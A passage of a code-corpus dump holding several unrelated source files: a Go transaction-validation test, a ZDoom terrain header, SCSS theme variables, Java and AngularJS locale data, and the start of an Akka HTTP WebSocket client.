basics.Round(1000),\n\t\t},\n\t\tPaymentTxnFields: transactions.PaymentTxnFields{\n\t\t\tReceiver: dst,\n\t\t\tAmount: basics.MicroAlgos{Raw: uint64(50)},\n\t\t\tCloseRemainderTo: src,\n\t\t},\n\t}\n\trequire.Error(t, tx.WellFormed(spec, config.Consensus[protocol.ConsensusCurrentVersion]))\n}\n\nfunc generateTestObjects(numTxs, numAccs int) ([]transactions.Transaction, []transactions.SignedTxn, []*crypto.SignatureSecrets, []basics.Address) {\n\ttxs := make([]transactions.Transaction, numTxs)\n\tsigned := make([]transactions.SignedTxn, numTxs)\n\tsecrets := make([]*crypto.SignatureSecrets, numAccs)\n\taddresses := make([]basics.Address, numAccs)\n\n\tfor i := 0; i < numAccs; i++ {\n\t\tsecret := keypair()\n\t\taddr := basics.Address(secret.SignatureVerifier)\n\t\tsecrets[i] = secret\n\t\taddresses[i] = addr\n\t}\n\n\tfor i := 0; i < numTxs; i++ {\n\t\ts := rand.Intn(numAccs)\n\t\tr := rand.Intn(numAccs)\n\t\ta := rand.Intn(1000)\n\t\tf := config.Consensus[protocol.ConsensusCurrentVersion].MinTxnFee + uint64(rand.Intn(10))\n\t\tiss := 50 + rand.Intn(30)\n\t\texp := iss + 10\n\n\t\ttxs[i] = transactions.Transaction{\n\t\t\tType: protocol.PaymentTx,\n\t\t\tHeader: transactions.Header{\n\t\t\t\tSender: addresses[s],\n\t\t\t\tFee: basics.MicroAlgos{Raw: f},\n\t\t\t\tFirstValid: basics.Round(iss),\n\t\t\t\tLastValid: basics.Round(exp),\n\t\t\t},\n\t\t\tPaymentTxnFields: transactions.PaymentTxnFields{\n\t\t\t\tReceiver: addresses[r],\n\t\t\t\tAmount: basics.MicroAlgos{Raw: uint64(a)},\n\t\t\t},\n\t\t}\n\t\tsigned[i] = txs[i].Sign(secrets[s])\n\t}\n\n\treturn txs, signed, secrets, addresses\n}\n\n/*\nfunc TestTxnValidation(t *testing.T) {\n\t_, signed, _, _ := generateTestObjects(100, 50)\n\ttc := ExplicitTxnContext{\n\t\tProto: config.Consensus[protocol.ConsensusCurrentVersion],\n\t}\n\n\tfor i, stxn := range signed {\n\t\tif stxn.Verify() != nil {\n\t\t\tt.Errorf(\"signed transaction %#v did not verify\", stxn)\n\t\t}\n\t\ttxn := stxn.Transaction.(Payment)\n\n\t\ttc.ExplicitRound = txn.First()+1\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"transaction not alive during lifetime %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.First()\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"transaction not alive at issuance %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.Last()\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"transaction not alive at expiry %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.First()-1\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"premature transaction alive %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.Last()+1\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"expired transaction alive %v\", txn)\n\t\t}\n\n\t\tbadSig := stxn\n\t\totherTransaction := txn\n\t\totherTransaction.Note = []byte{42}\n\t\tbadSig.Transaction = &otherTransaction\n\t\tbadSig.InitCaches()\n\t\tif badSig.Verify() == nil {\n\t\t\tt.Errorf(\"modified transaction %#v verified incorrectly\", badSig)\n\t\t}\n\n\t\tnoSig := stxn\n\t\tnoSig.Sig = crypto.Signature{}\n\t\tif noSig.Verify() == nil {\n\t\t\tt.Errorf(\"transaction with no signature %#v verified incorrectly\", noSig)\n\t\t}\n\n\t\tlargeWindow := stxn\n\t\tlargeWindow.LastValid += basics.Round(config.Protocol.MaxTxnLife)\n\t\tif largeWindow.Verify() == nil {\n\t\t\tt.Errorf(\"transaction with large window %#v verified incorrectly\", largeWindow)\n\t\t}\n\n\t\tbadWindow := txn\n\t\tbadWindow.Payment.LastValid = badWindow.Payment.FirstValid - 1\n\t\tif badWindow.Verify() == nil {\n\t\t\tt.Errorf(\"transaction with bad window %#v verified incorrectly\", badWindow)\n\t\t}\n\n\t\tbadFee := txn\n\t\tbadFee.Payment.Fee = basics.MicroAlgos{}\n\t\tif badFee.Verify() == nil {\n\t\t\tt.Errorf(\"transaction with small fee %#v verified incorrectly\", badFee)\n\t\t}\n\n\t\toverflow := txn\n\t\toverflow.Payment.Amount = basics.MicroAlgos{}\n\t\toverflow.Payment.Fee = basics.MicroAlgos{Raw: 10}\n\t\tif overflow.Verify() == nil {\n\t\t\tt.Errorf(\"transaction with overflowing amount %#v verified incorrectly\", overflow)\n\t\t}\n\n\t\tif i > 5 {\n\t\t\tbreak\n\t\t}\n\t}\n}\n*/\n"} {"text": "/*\r\n** p_terrain.h\r\n**\r\n**---------------------------------------------------------------------------\r\n** Copyright 1998-2006 Randy Heit\r\n** All rights reserved.\r\n**\r\n** Redistribution and use in source and binary forms, with or without\r\n** modification, are permitted provided that the following conditions\r\n** are met:\r\n**\r\n** 1. Redistributions of source code must retain the above copyright\r\n** notice, this list of conditions and the following disclaimer.\r\n** 2. Redistributions in binary form must reproduce the above copyright\r\n** notice, this list of conditions and the following disclaimer in the\r\n** documentation and/or other materials provided with the distribution.\r\n** 3. The name of the author may not be used to endorse or promote products\r\n** derived from this software without specific prior written permission.\r\n**\r\n** THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR\r\n** IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\r\n** OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.\r\n** IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,\r\n** INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT\r\n** NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\r\n** DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\r\n** THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\r\n** (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF\r\n** THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n**---------------------------------------------------------------------------\r\n**\r\n*/\r\n\r\n#ifndef __P_TERRAIN_H__\r\n#define __P_TERRAIN_H__\r\n\r\n#include \"s_sound.h\"\r\n#include \"textures/textures.h\"\r\n\r\nstruct PClass;\r\n\r\nextern WORD DefaultTerrainType;\r\n\r\n\r\nclass FTerrainTypeArray\r\n{\r\npublic:\r\n\tTArray Types;\r\n\r\n\tWORD operator [](FTextureID tex) const\r\n\t{\r\n\t\tif ((unsigned)tex.GetIndex() >= Types.Size()) return DefaultTerrainType;\r\n\t\tWORD type = Types[tex.GetIndex()];\r\n\t\treturn type == 0xffff? DefaultTerrainType : type;\r\n\t}\r\n\tWORD operator [](int texnum) const\r\n\t{\r\n\t\tif ((unsigned)texnum >= Types.Size()) return DefaultTerrainType;\r\n\t\tWORD type = Types[texnum];\r\n\t\treturn type == 0xffff? DefaultTerrainType : type;\r\n\t}\r\n\tvoid Resize(unsigned newsize)\r\n\t{\r\n\t\tTypes.Resize(newsize);\r\n\t}\r\n\tvoid Clear()\r\n\t{\r\n\t\tmemset (&Types[0], 0xff, Types.Size()*sizeof(WORD));\r\n\t}\r\n\tvoid Set(int index, int value)\r\n\t{\r\n\t\tif ((unsigned)index >= Types.Size())\r\n\t\t{\r\n\t\t\tint oldsize = Types.Size();\r\n\t\t\tResize(index + 1);\r\n\t\t\tmemset(&Types[oldsize], 0xff, (index + 1 - oldsize)*sizeof(WORD));\r\n\t\t}\r\n\t\tTypes[index] = value;\r\n\t}\r\n};\r\n\r\nextern FTerrainTypeArray TerrainTypes;\r\n\r\n// at game start\r\nvoid P_InitTerrainTypes ();\r\n\r\nstruct FSplashDef\r\n{\r\n\tFName Name;\r\n\tFSoundID SmallSplashSound;\r\n\tFSoundID NormalSplashSound;\r\n\tconst PClass *SmallSplash;\r\n\tconst PClass *SplashBase;\r\n\tconst PClass *SplashChunk;\r\n\tBYTE ChunkXVelShift;\r\n\tBYTE ChunkYVelShift;\r\n\tBYTE ChunkZVelShift;\r\n\tfixed_t ChunkBaseZVel;\r\n\tfixed_t SmallSplashClip;\r\n\tbool NoAlert;\r\n};\r\n\r\nstruct FTerrainDef\r\n{\r\n\tFName Name;\r\n\tint Splash;\r\n\tint DamageAmount;\r\n\tFName DamageMOD;\r\n\tint DamageTimeMask;\r\n\tfixed_t FootClip;\r\n\tfloat StepVolume;\r\n\tint WalkStepTics;\r\n\tint RunStepTics;\r\n\tFSoundID LeftStepSound;\r\n\tFSoundID RightStepSound;\r\n\tbool IsLiquid;\r\n\tbool AllowProtection;\r\n\tfixed_t Friction;\r\n\tfixed_t MoveFactor;\r\n};\r\n\r\nextern TArray Splashes;\r\nextern TArray Terrains;\r\n\r\nclass FArchive;\r\nint P_FindTerrain(FName name);\r\nvoid P_SerializeTerrain(FArchive &arc, int &terrainnum);\r\n\r\n#endif //__P_TERRAIN_H__\r\n"} {"text": "// ┌───────────┐\n// │ Variables │\n// └───────────┘\n//\n// Main variables\n\n@import \"color-variables\"; // Calcite color variables\n\n// ---------------------------------------------------------------\n// UI\n// ---------------------------------------------------------------\n\n$base_ui_margin: 15px !default;\n$base_ui_position_absolute: 15px !default;\n$base_ui_font_size: 14px;\n\n// ---------------------------------------------------------------\n// Media breaks\n// ---------------------------------------------------------------\n\n// Width - Devices including iPad portrait\n$base_breakpoint_max_width_xxs: 320px;\n$base_breakpoint_max_width_xs: 544px;\n$base_breakpoint_max_width_sm: 768px;\n\n// Height - Devices smaller than iPad landscape\n$base_breakpoint_min_height_xxs: 320px;\n$base_breakpoint_min_height_xs: 544px;\n$base_breakpoint_min_height_sm: 767px;\n$base_breakpoint_min_height_md: 992px;\n\n// ---------------------------------------------------------------\n// Map\n// ---------------------------------------------------------------\n\n$map_fixed_width: 768px !default;\n$map_fixed_height: 500px !default;\n$map_attribution_height: 16px !default; \n\n// ---------------------------------------------------------------\n// Navbar\n// ---------------------------------------------------------------\n\n// Size\n$navbar_height: 50px !default; // small 50px, medium 60px, large 85px\n$navbar_margin: $base_ui_margin !default;\n// Nav\n$navbar_nav_li_a_padding: 15px 15px !default;\n$navbar_nav_font_size: $base_ui_font_size;\n// Menu dropdown toggle\n$navbar_dropdown_toggle_margin: 0;\n$navbar_dropdown_toggle_padding: 17px 20px 19px 22px !default;\n$navbar_dropdown_toggle_padding_mobile: 17px 18px 19px 20px !default;\n$navbar_dropdown_toggle_icon_bar_height: 14px !default;\n$navbar_dropdown_toggle_icon_bar_width: 17px !default;\n// Brand\n$navbar_brand_padding: 10px 15px !default;\n$navbar_brand_font_size: 32px !default;\n// Title - main\n$navbar_title_margin: 0 !default;\n$navbar_title_padding: 1px 0 2px !default;\n$navbar_title_font_size: 22px !default;\n$navbar_title_font_weight: 400;\n$navbar_title_font_size_mobile: 20px !default;\n// Title - divider\n$navbar_title_divider_margin: 0 15px;\n// Title - sub\n$navbar_subtitle_margin: 0 !default;\n$navbar_subtitle_padding: 1px 0 0 !default;\n$navbar_subtitle_font_size: 13px !default;\n$navbar_subtitle_font_weight: 400 !default;\n$navbar_subtitle_font_size_mobile: 12px !default;\n// Breakpoints\n$navbar_breakpoint_width_mobile: $base_breakpoint_max_width_sm !default;\n\n// ---------------------------------------------------------------\n// Dropdown\n// ---------------------------------------------------------------\n\n$dropdown_menu_padding: 0;\n$dropdown_menu_li_a_padding: 9px 15px;\n$dropdown_toggle_font_size: $base_ui_font_size !default;\n$dropdown_menu_font_size: $base_ui_font_size !default;\n// Size\n$dropdown_menu_max_height: 500px;\n$dropdown_menu_max_height_mobile: 215px !default;\n// Breakpoints\n$dropdown_breakpoint_height_mobile: $base_breakpoint_min_height_sm !default;\n$dropdown_breakpoint_width_mobile: $base_breakpoint_max_width_sm !default;\n\n// ---------------------------------------------------------------\n// Panel\n// ---------------------------------------------------------------\n\n// Position\n$panels_position_top: $base_ui_position_absolute;\n$panels_position_right: $base_ui_position_absolute;\n$panels_position_left: $base_ui_position_absolute;\n// Size\n$panels_width: auto;\n$panels_width_mobile: 100% !default;\n$panel_title_height: 33px !default; // controls minimized size\n// Body\n$panel_body_width: 350px !default; // controls width of all panels\n$panel_body_width_mobile: 100% !default; // full width in mobile\n$panel_body_min_height: 50px !default;\n$panel_body_max_height: 500px !default; // default\n// Only use half of the height available\n$panel_body_height_xxs: $base_breakpoint_min_height_xxs / 2 !default; \n$panel_body_height_xs: $base_breakpoint_min_height_xs / 2 !default;\n$panel_body_height_sm: $base_breakpoint_min_height_sm / 2 !default;\n$panel_body_height_md: $base_breakpoint_min_height_md / 2 !default;\n// Optional - Perform max height calculations (nav - title - margin)\n// $panel_space: $navbar_height + 38px + $base_ui_margin; \n$panel_body_max_height_expanded: 125px !default;\n// Font\n$panel_font_size: 13px !default;\n$panel_title_font_size: 14px !default;\n$panel_title_font_weight: 400 !default;\n// Form elements\n$panel_form_control_height: 34px !default;\n// Breakpoints\n$panels_breakpoint_width_mobile: $base_breakpoint_max_width_sm !default;\n$panels_breakpoint_height_xxs: $base_breakpoint_min_height_xxs !default;\n$panels_breakpoint_height_xs: $base_breakpoint_min_height_xs !default;\n$panels_breakpoint_height_sm: $base_breakpoint_min_height_sm !default;\n$panels_breakpoint_height_md: $base_breakpoint_min_height_md !default;\n\n// ---------------------------------------------------------------\n// Theme - All\n// ---------------------------------------------------------------\n\n$navbar_decoration_trans_percentage: 96% !default;\n$navbar_decoration_color_height: 2px !default;\n$theme_all_navbar_opacity: 0.75;\n\n// ---------------------------------------------------------------\n// Theme - Light (light background, dark text)\n// ---------------------------------------------------------------\n\n// Navbar\n$theme_light_navbar_bg: $Calcite_Gray_050;\n$theme_light_navbar_text_color: $Calcite_Gray_700;\n$theme_light_navbar_text_color_hover: $Calcite_True_Black;\n$theme_light_navbar_decoration_color: $Calcite_Gray_700;\n$theme_light_navbar_text_color_disabled: $Calcite_Gray_550;\n$theme_light_navbar_text_color_secondary: $Calcite_Gray_600;\n// Dropdown\n$theme_light_dropdown_menu_bg: $Calcite_Gray_050;\n$theme_light_dropdown_menu_bg_hover: $Calcite_Gray_150;\n$theme_light_dropdown_menu_text_color: $Calcite_Gray_650;\n$theme_light_dropdown_menu_border_color: $Calcite_Gray_100;\n$theme_light_dropdown_menu_shadow:\t\t\t\t1px 1px 1px 0 rgba(0,0,0,.1);\n// Panel\n$theme_light_panel_bg: $Calcite_Gray_050;\n$theme_light_panel_text_color: $Calcite_Gray_650;\n$theme_light_panel_header_text_color: $Calcite_Gray_600;\n$theme_light_panel_header_close_color:\t\t\t\t$Calcite_Gray_500;\n$theme_light_panel_header_text_color_hover: $Calcite_Gray_700;\n$theme_light_panel_header_bg: $Calcite_Gray_150;\n$theme_light_panel_header_bg_hover: $Calcite_Gray_200;\n$theme_light_panel_header_bg_active: $Calcite_Gray_200;\n$theme_light_panel_border_color: $Calcite_Gray_250;\n$theme_light_panel_decoration_color:\t\t\t\t\t$Calcite_Gray_650;\n// Panel - Controls\n$theme_light_control_bg: \t$Calcite_Gray_050;\n$theme_light_control_bg_hover: \t$Calcite_Gray_200;\n$theme_light_control_bg_active: \t$Calcite_Gray_050;\n$theme_light_control_text_color: \t$Calcite_Gray_650;\n$theme_light_control_text_color_hover: \t$Calcite_Gray_700;\n$theme_light_control_text_color_disabled: $Calcite_Gray_550;\n$theme_light_control_border_color: \t$Calcite_Gray_450;\n$theme_light_control_border_color_hover:\t$Calcite_Gray_700;\n// Panel - Anchors\n$theme_light_link_color: inherit;\n$theme_light_link_color_hover: inherit;\n\n// ---------------------------------------------------------------\n// Theme - Dark (dark background, light text)\n// ---------------------------------------------------------------\n\n// Navbar\n$theme_dark_navbar_bg: $Calcite_Gray_300_Dark;\n$theme_dark_navbar_text_color: $Calcite_Gray_050;\n$theme_dark_navbar_text_color_hover: $Calcite_True_White;\n$theme_dark_navbar_decoration_color:\t\t$Calcite_Gray_050;\n$theme_dark_navbar_text_color_disabled: $Calcite_Gray_250;\n$theme_dark_navbar_text_color_secondary: $Calcite_Gray_100;\n// Dropdown\n$theme_dark_dropdown_menu_bg: \t$Calcite_Gray_100_Dark;\n$theme_dark_dropdown_menu_bg_hover: \t$Calcite_Gray_300_Dark;\n$theme_dark_dropdown_menu_text_color:\t\t\t$Calcite_Gray_050;\n$theme_dark_dropdown_menu_border_color: \t$Calcite_Gray_100_Dark;\n$theme_dark_dropdown_menu_shadow:\t\t\t\t\t1px 1px 1px 0 rgba(0,0,0,.1);\n// Panel\n$theme_dark_panel_bg: $Calcite_Gray_300_Dark;\n$theme_dark_panel_text_color: $Calcite_Gray_050; \n$theme_dark_panel_header_text_color: $Calcite_Gray_050;\n$theme_dark_panel_header_close_color:\t\t\t\t$Calcite_Gray_050;\n$theme_dark_panel_header_text_color_hover: $Calcite_True_White;\n$theme_dark_panel_header_bg: $Calcite_Gray_300_Dark;\n$theme_dark_panel_header_bg_hover: $Calcite_Gray_350_Dark;\n$theme_dark_panel_header_bg_active: $Calcite_Gray_400_Dark;\n$theme_dark_panel_border_color: $Calcite_Gray_300_Dark;\n$theme_dark_panel_decoration_color:\t\t\t\t\t$Calcite_Gray_650_Dark;\n// Panel - Controls\n$theme_dark_control_bg: $Calcite_Gray_100_Dark; \n$theme_dark_control_bg_hover: $Calcite_Gray_100_Dark;\n$theme_dark_control_bg_active: $Calcite_Gray_100_Dark;\n$theme_dark_control_text_color: $Calcite_Gray_050;\n$theme_dark_control_text_color_hover: $Calcite_True_White;\n$theme_dark_control_text_color_disabled: $Calcite_Gray_250;\n$theme_dark_control_border_color: $Calcite_Gray_400_Dark;\n$theme_dark_control_border_color_hover:\t$Calcite_Gray_050;\n// Panel - Anchors\n$theme_dark_link_color: $Calcite_Highlight_Blue_350_Dark;\n$theme_dark_link_color_hover: $Calcite_Highlight_Blue_400_Dark;\n\n// ---------------------------------------------------------------\n// Theme - Custom (single color backgrounds, light or dark text)\n// ---------------------------------------------------------------\n\n// Navbar\n$theme_custom_navbar_bg: \t\t\t\t\t\t\t\t\tinherit;\n// Dropdown Menu\n$theme_custom_dropdown_menu_bg: \t\t\t\t\tinherit;\n$theme_custom_dropdown_menu_bg_hover: \t\trgba(255,255,255,0.15);\n$theme_custom_dropdown_menu_shadow:\t\t\t\t1px 1px 1px 0 rgba(0,0,0,0.1);\n// Panel\n$theme_custom_panel_bg: \t\t\t\t\t\t\t\t\tinherit;\n$theme_custom_panel_header_bg: \t\t\t\t\t\ttransparent; //rgba(255,255,255,0); //rgba(255,255,255,0.15);\n$theme_custom_panel_header_bg_hover: \t\t\trgba(255,255,255,0.25);\n$theme_custom_panel_header_bg_active: \t\tinherit;\n// Panel - Controls\n$theme_custom_panel_control_bg: \t\t\t\t\tinherit;\n$theme_custom_panel_control_bg_hover: \t\tinherit;\n$theme_custom_panel_control_bg_active: \t\tinherit;\n$theme_custom_panel_control_border_color:\trgba(255,255,255,0.35);\n$theme_custom_panel_tab_shadow_top:\t\t\t\t0 -2px 0 0;\n\n\n\n"} {"text": "/*\n * Copyright (c) 2013, Oracle and/or its affiliates. All rights reserved.\n * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.\n *\n * This code is free software; you can redistribute it and/or modify it\n * under the terms of the GNU General Public License version 2 only, as\n * published by the Free Software Foundation. Oracle designates this\n * particular file as subject to the \"Classpath\" exception as provided\n * by Oracle in the LICENSE file that accompanied this code.\n *\n * This code is distributed in the hope that it will be useful, but WITHOUT\n * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n * version 2 for more details (a copy is included in the LICENSE file that\n * accompanied this code).\n *\n * You should have received a copy of the GNU General Public License version\n * 2 along with this work; if not, write to the Free Software Foundation,\n * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n *\n * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA\n * or visit www.oracle.com if you need additional information or have any\n * questions.\n */\n\n/*\n * COPYRIGHT AND PERMISSION NOTICE\n *\n * Copyright (C) 1991-2012 Unicode, Inc. All rights reserved. Distributed under\n * the Terms of Use in http://www.unicode.org/copyright.html.\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of the Unicode data files and any associated documentation (the \"Data\n * Files\") or Unicode software and any associated documentation (the\n * \"Software\") to deal in the Data Files or Software without restriction,\n * including without limitation the rights to use, copy, modify, merge,\n * publish, distribute, and/or sell copies of the Data Files or Software, and\n * to permit persons to whom the Data Files or Software are furnished to do so,\n * provided that (a) the above copyright notice(s) and this permission notice\n * appear with all copies of the Data Files or Software, (b) both the above\n * copyright notice(s) and this permission notice appear in associated\n * documentation, and (c) there is clear notice in each modified Data File or\n * in the Software as well as in the documentation associated with the Data\n * File(s) or Software that the data or software has been modified.\n *\n * THE DATA FILES AND SOFTWARE ARE PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY\n * KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF\n * THIRD PARTY RIGHTS. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR HOLDERS\n * INCLUDED IN THIS NOTICE BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL INDIRECT OR\n * CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE,\n * DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER\n * TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE\n * OF THE DATA FILES OR SOFTWARE.\n *\n * Except as contained in this notice, the name of a copyright holder shall not\n * be used in advertising or otherwise to promote the sale, use or other\n * dealings in these Data Files or Software without prior written authorization\n * of the copyright holder.\n */\n\n// Note: this file has been generated by a tool.\n\npackage sun.text.resources.en;\n\nimport sun.util.resources.OpenListResourceBundle;\n\npublic class JavaTimeSupplementary_en extends OpenListResourceBundle {\n @Override\n protected final Object[][] getContents() {\n return new Object[][] {\n { \"QuarterAbbreviations\",\n new String[] {\n \"Q1\",\n \"Q2\",\n \"Q3\",\n \"Q4\",\n }\n },\n { \"QuarterNames\",\n new String[] {\n \"1st quarter\",\n \"2nd quarter\",\n \"3rd quarter\",\n \"4th quarter\",\n }\n },\n { \"calendarname.buddhist\",\n \"Buddhist Calendar\" },\n { \"calendarname.gregorian\",\n \"Gregorian Calendar\" },\n { \"calendarname.gregory\",\n \"Gregorian Calendar\" },\n { \"calendarname.islamic\",\n \"Islamic Calendar\" },\n { \"calendarname.islamic-civil\",\n \"Islamic-Civil Calendar\" },\n { \"calendarname.islamicc\",\n \"Islamic-Civil Calendar\" },\n { \"calendarname.japanese\",\n \"Japanese Calendar\" },\n { \"calendarname.roc\",\n \"Minguo Calendar\" },\n { \"field.dayperiod\",\n \"AM/PM\" },\n { \"field.era\",\n \"Era\" },\n { \"field.hour\",\n \"Hour\" },\n { \"field.minute\",\n \"Minute\" },\n { \"field.month\",\n \"Month\" },\n { \"field.second\",\n \"Second\" },\n { \"field.week\",\n \"Week\" },\n { \"field.weekday\",\n \"Day of the Week\" },\n { \"field.year\",\n \"Year\" },\n { \"field.zone\",\n \"Time Zone\" },\n { \"islamic.DatePatterns\",\n new String[] {\n \"EEEE, MMMM d, y GGGG\",\n \"MMMM d, y GGGG\",\n \"MMM d, y GGGG\",\n \"M/d/yy GGGG\",\n }\n },\n { \"java.time.buddhist.DatePatterns\",\n new String[] {\n \"EEEE, MMMM d, y G\",\n \"MMMM d, y G\",\n \"MMM d, y G\",\n \"M/d/yy GGGGG\",\n }\n },\n { \"java.time.islamic.DatePatterns\",\n new String[] {\n \"EEEE, MMMM d, y G\",\n \"MMMM d, y G\",\n \"MMM d, y G\",\n \"M/d/yy G\",\n }\n },\n { \"java.time.japanese.DatePatterns\",\n new String[] {\n \"EEEE, MMMM d, y G\",\n \"MMMM d, y G\",\n \"MMM d, y G\",\n \"M/d/yy GGGGG\",\n }\n },\n { \"java.time.long.Eras\",\n new String[] {\n \"Before Christ\",\n \"Anno Domini\",\n }\n },\n { \"java.time.roc.DatePatterns\",\n new String[] {\n \"EEEE, MMMM d, y G\",\n \"MMMM d, y G\",\n \"MMM d, y G\",\n \"M/d/yy GGGGG\",\n }\n },\n { \"java.time.short.Eras\",\n new String[] {\n \"BC\",\n \"AD\",\n }\n },\n { \"roc.DatePatterns\",\n new String[] {\n \"EEEE, MMMM d, y GGGG\",\n \"MMMM d, y GGGG\",\n \"MMM d, y GGGG\",\n \"M/d/yy G\",\n }\n },\n };\n }\n}\n"} {"text": "'use strict';\nangular.module(\"ngLocale\", [], [\"$provide\", function($provide) {\nvar PLURAL_CATEGORY = {ZERO: \"zero\", ONE: \"one\", TWO: \"two\", FEW: \"few\", MANY: \"many\", OTHER: \"other\"};\n$provide.value(\"$locale\", {\n \"DATETIME_FORMATS\": {\n \"AMPMS\": [\n \"AM\",\n \"PM\"\n ],\n \"DAY\": [\n \"dimanche\",\n \"lundi\",\n \"mardi\",\n \"mercredi\",\n \"jeudi\",\n \"vendredi\",\n \"samedi\"\n ],\n \"MONTH\": [\n \"janvier\",\n \"f\\u00e9vrier\",\n \"mars\",\n \"avril\",\n \"mai\",\n \"juin\",\n \"juillet\",\n \"ao\\u00fbt\",\n \"septembre\",\n \"octobre\",\n \"novembre\",\n \"d\\u00e9cembre\"\n ],\n \"SHORTDAY\": [\n \"dim.\",\n \"lun.\",\n \"mar.\",\n \"mer.\",\n \"jeu.\",\n \"ven.\",\n \"sam.\"\n ],\n \"SHORTMONTH\": [\n \"janv.\",\n \"f\\u00e9vr.\",\n \"mars\",\n \"avr.\",\n \"mai\",\n \"juin\",\n \"juil.\",\n \"ao\\u00fbt\",\n \"sept.\",\n \"oct.\",\n \"nov.\",\n \"d\\u00e9c.\"\n ],\n \"fullDate\": \"EEEE d MMMM y\",\n \"longDate\": \"d MMMM y\",\n \"medium\": \"d MMM y HH:mm:ss\",\n \"mediumDate\": \"d MMM y\",\n \"mediumTime\": \"HH:mm:ss\",\n \"short\": \"dd/MM/yy HH:mm\",\n \"shortDate\": \"dd/MM/yy\",\n \"shortTime\": \"HH:mm\"\n },\n \"NUMBER_FORMATS\": {\n \"CURRENCY_SYM\": \"\\u20ac\",\n \"DECIMAL_SEP\": \",\",\n \"GROUP_SEP\": \"\\u00a0\",\n \"PATTERNS\": [\n {\n \"gSize\": 3,\n \"lgSize\": 3,\n \"macFrac\": 0,\n \"maxFrac\": 3,\n \"minFrac\": 0,\n \"minInt\": 1,\n \"negPre\": \"-\",\n \"negSuf\": \"\",\n \"posPre\": \"\",\n \"posSuf\": \"\"\n },\n {\n \"gSize\": 3,\n \"lgSize\": 3,\n \"macFrac\": 0,\n \"maxFrac\": 2,\n \"minFrac\": 2,\n \"minInt\": 1,\n \"negPre\": \"(\",\n \"negSuf\": \"\\u00a0\\u00a4)\",\n \"posPre\": \"\",\n \"posSuf\": \"\\u00a0\\u00a4\"\n }\n ]\n },\n \"id\": \"fr-ga\",\n \"pluralCat\": function (n) { if (n >= 0 && n <= 2 && n != 2) { return PLURAL_CATEGORY.ONE; } return PLURAL_CATEGORY.OTHER;}\n});\n}]);"} {"text": "/*\n * Copyright (C) 2009-2020 Lightbend Inc. \n */\n\npackage akka.http.impl.engine.ws\n\nimport akka.NotUsed\nimport akka.annotation.InternalApi\nimport akka.http.scaladsl.model.ws._\n\nimport scala.concurrent.{ Future, Promise }\nimport akka.util.ByteString\nimport akka.event.LoggingAdapter\nimport akka.stream.stage._\nimport akka.stream._\nimport akka.stream.TLSProtocol._\nimport akka.stream.scaladsl._\nimport akka.http.scaladsl.settings.ClientConnectionSettings\nimport akka.http.scaladsl.Http\nimport akka.http.scaladsl.model.{ HttpMethods, HttpResponse }\nimport akka.http.scaladsl.model.headers.Host\nimport akka.http.impl.engine.parsing.HttpMessageParser.StateResult\nimport akka.http.impl.engine.parsing.ParserOutput.{ MessageStartError, NeedMoreData, RemainingBytes, ResponseStart }\nimport akka.http.impl.engine.parsing.{ HttpHeaderParser, HttpResponseParser, ParserOutput }\nimport akka.http.impl.engine.rendering.{ HttpRequestRendererFactory, RequestRenderingContext }\nimport akka.http.impl.engine.ws.Handshake.Client.NegotiatedWebSocketSettings\nimport akka.http.impl.util.LogByteStringTools\nimport akka.http.impl.util.{ SingletonException, StreamUtils }\nimport akka.stream.impl.fusing.GraphStages.SimpleLinearGraphStage\n\nimport scala.collection.immutable\n\n/** INTERNAL API */\n@InternalApi\nprivate[http] object WebSocketClientBlueprint {\n /**\n * Returns a WebSocketClientLayer that can be materialized once.\n */\n def apply(\n request: WebSocketRequest,\n settings: ClientConnectionSettings,\n log: LoggingAdapter): Http.WebSocketClientLayer =\n LogByteStringTools.logTLSBidiBySetting(\"client-plain-text\", settings.logUnencryptedNetworkBytes).reversed\n .atop(simpleTls)\n .atopMat(handshake(request, settings, log))(Keep.right)\n .atop(WebSocket.framing)\n .atop(WebSocket.stack(serverSide = false, settings.websocketSettings, log = log))\n .reversed\n\n /**\n * A bidi flow that injects and inspects the WS handshake and then goes out of the way. This BidiFlow\n * can only be materialized once.\n */\n def handshake(\n request: WebSocketRequest,\n 